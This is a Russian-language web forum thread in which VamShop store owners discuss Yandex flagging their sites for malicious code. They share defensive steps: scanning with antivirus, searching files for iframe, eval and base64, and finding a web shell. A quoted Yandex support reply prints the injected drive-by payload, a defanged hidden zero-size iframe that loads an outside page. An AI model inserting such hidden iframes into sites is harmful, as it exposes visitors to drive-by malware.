Срочно нужна помощь! Вредоносный код.

[LD_50 0]

Всем привет!

Мне срочно нужна помощь! Получил сегодня письмо от яндекс о том, что на моем сайте www.kupimama35.ru обнаружен код, который может быть опасен для посетителей. Сайт на vamshop 1,65, последние изменения вносил 11.10.2011г., до сегодняшнего дня все было ОК.

Кто знает как проанализировать код? Как искать ошибки? Как исправлять и что делать?!

Пожалуйста, помогите! Готов оплатить услуги )

[LD_50 0]

Яндекс.Вебмастер говорит, что проблема на странице http://www.kupimama35.ru, вердикт - поведенческий анализ

[support 447]

Вроде как по ссылке никакого вредоносного кода нет, во всяком случае я не вижу.

[YuraS 4]

я тоже смотрел. не нашел ничего. может, на гугл-аналитикс ругается? :blink:

[LD_50 0]

Ситуация совершенно мне непонятная. Сейчас не стал ждать - восстановил полностью сайт из бэкапа с откатом на 5 дней назад.

До этого проверял по датам изменения файлов на FTP - ничего не нашел, последнее изменение 11.10.11г. (кроме кэша и т.п.). Гугл аналистикс тоже ничего не обнаружил. Только Яндекс такой умный. Написал вопрос им в техподдержку - тишина до сих пор. Отправил запрос на перепроверку - "Вредоносный код не обнаружен". Может и правда что-то было?

В чем было дело так и не разобрался. Яндекс выдавал только: "вердикт - поведенческий анализ". Проверяют они якобы утилитами sophos или как-то так.

[support 447]

Может глюк какой был, всякое ж бывает.

[buddha 0]

А редиректов на другие сайты никаких нет? Изменений в файле .htaccess?

[YuraS 4]

тоже сегодня ЯВМ сообщил, что на сайте (не на вамшоп) размещен какой-то вредоносный код. все пересмотрел на сервере. ничего не нашел. траф упал с 2к до 400 в сутки. :(

[LD_50 0]

А редиректов на другие сайты никаких нет? Изменений в файле .htaccess?

Редиректов нет, ссылок на "левые" сайты тоже нет, изменения в .htaccess с датой гораздо старше, чем произошел сбой. При том сравнил с копией на локалке - совпадает. Видимо Яндекс "экспериментирует".

[YuraS 4]

нажал на ссылку "Перепроверить" и через пару часов перестал Яндекс блокировать сайт.

[LD_50 0]

Опять проблема!

На этот раз прописал:

Поведенческий анализ

Антивирусный робот Яндекса при проверке страниц отслеживает выполнение JavaScript кода, на основе поведенческого анализа . Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, то поведенческий анализатор принимает решение о том, что сайт содержит вредоносный код, и выносит вердикт Exploit.

Может есть у кого какие идеи?

Почему-то ругается на:

http://www.kupimama35.ru/product_info.php?products_id=213

[support 447]

А почему только на одну страницу ругается?

Если б был вирус, то уж точно все страницы карточки товара должны были бы не нравиться яндексу.

[LD_50 0]

Вот и мне кажется это все ооочень странным. Посмотрел всю информацию касательного этого товара - ничего необычного. Гугл говорит, что никакого вредоносного кода нет.

У Вас также пишет, что сайт может угрожать безопасности компьютера.

[support 447]

Попробуйте в поддержку яндекса написать, может что более конкретное скажут.

Хотя бы какой файл не нравится.

[YuraS 4]

мля... как саипал этот Яндекс с его хз откуда появляющимися алгоритмами.

[LD_50 0]

Оказывается Яндекс не зря ругался. Ответ техподдержки:

В настоящий момент с Вашим сайтом все в порядке, он прошёл перепроверку и не помечен как угрожающий безопасности компьютера.

Обнаруженный на сайте (например, на странице www.kupimama35.ru/product_info.php?products_id=213) вредоносный код выглядел следующим образом:

[iframe src="h**p://12avenida.com/mainpain.php?page=e9fdcf29bf36d34a" width="0" height="0" frameborder="0"></iframe]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки изменены во избежание случайного срабатывания кода.

Восстановление сайта из бэкапа является временной мерой, рекомендуем Вам найти и устранить уязвимость. Некоторые советы по поиску кода Вы можете найти на страницах нашей Помощи:

http://help.yandex.r...ter/?id=1116613

http://help.yandex.r...ter/?id=1120943

Кто знает как проще искать этот код в куче файлов сайта?

[support 447]

Для начала запускать поиск по всем файлам по iframe, но вряд ли найдёт.

Обычно код закодирован.

Ищите по всем файлв по словам eval , затем base64

[LD_50 0]

В vamshop не должно быть eval и base64? За отдельную плату Вы не можете оказать мне такую услугу? )

[support 447]

Должны быть, но только в библиотеках типа phpmailer, насколько я помню.

Пришлите в личку ещё раз информацию о проблеме, ссылку на магазин, доступ на ftp.

Попробуйте посмотреть.

Какая версия VamShop.

Если очень старая, то ничего удивительного, ведь в обновлениях закрываются в том числе проблемы безопасности.

[-Inna- 0]

версию он указвал же 1.65

была такая же история.

код чист как девственница.

яндекс один день находит вредоносный код

другой день не находит.

-------------------------

оказываеться срабатывало как то еще и по айпи

то есть только раз на один айпи в сутки.

1.что делалось

слили сайт в локалку проверили каспером - чисто

проверили доктор веб - нашли шел!!!

но в шеле самом ничего вредоносного нет.просто

кто то поимел доступ на сайт таким образом

поискали ручками по предмет зашифрованных участков кода

и нашли кусок кода на джаве. вел на китайский сайт.

после его удаления яндекс перестал ругаться

так что ищете base64

[support 447]

Это конечно уже интереснее.

А раньше не стояло старой версии?

В принципе, shell могли и раньше загрузить.

Если версия всегда свежая была и появилась кака в магазине и если у Вас сохранились access лог-файлы и известна примерная дата, когда как появилась, то пришлите доступ к access файлам, попробую посмотреть, как этот вирус попал в магазин.

[LD_50 0]

Вчера хостер в виде исключения прогнал мой сайт двумя антивирами и кьюрейтом др.веб - ничего. Поискал на предмет вхождения eval, base64, iframe и по имени того сайта - ничего. правда сам сайт и базы были восстановлены и почищены из бэкапа с откатом чуть больше месяца назад. Может помогло. Посмотрим, что получится. Если еще раз выдаст предупреждение - буду искать код.

С версией описка вышла. Сейчас 1.64. Самая первыая была кажется 1,60 или даже 1,58, стояла долго. Потом обновлялся не то чтобы и сразу, но регулярно.

[support 447]

Может у Вас shell загружен, через который ломают.

Попробуйте взять из архива текущей версии файл /images/.htaccess

И положить его к себе в /images/

/admin/images/

/pub/

/temp/

/export/

/import/

[terrom 0]

У меня возникла таже проблема=(

Версия легальная, 1,67.

Причина следующая:

Поведенческий анализ

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, то принимается решение о том, что на странице содержится вредоносный код.

Что мне делать!???

[terrom 0]

адрес сайта http://badminton-shop.ru/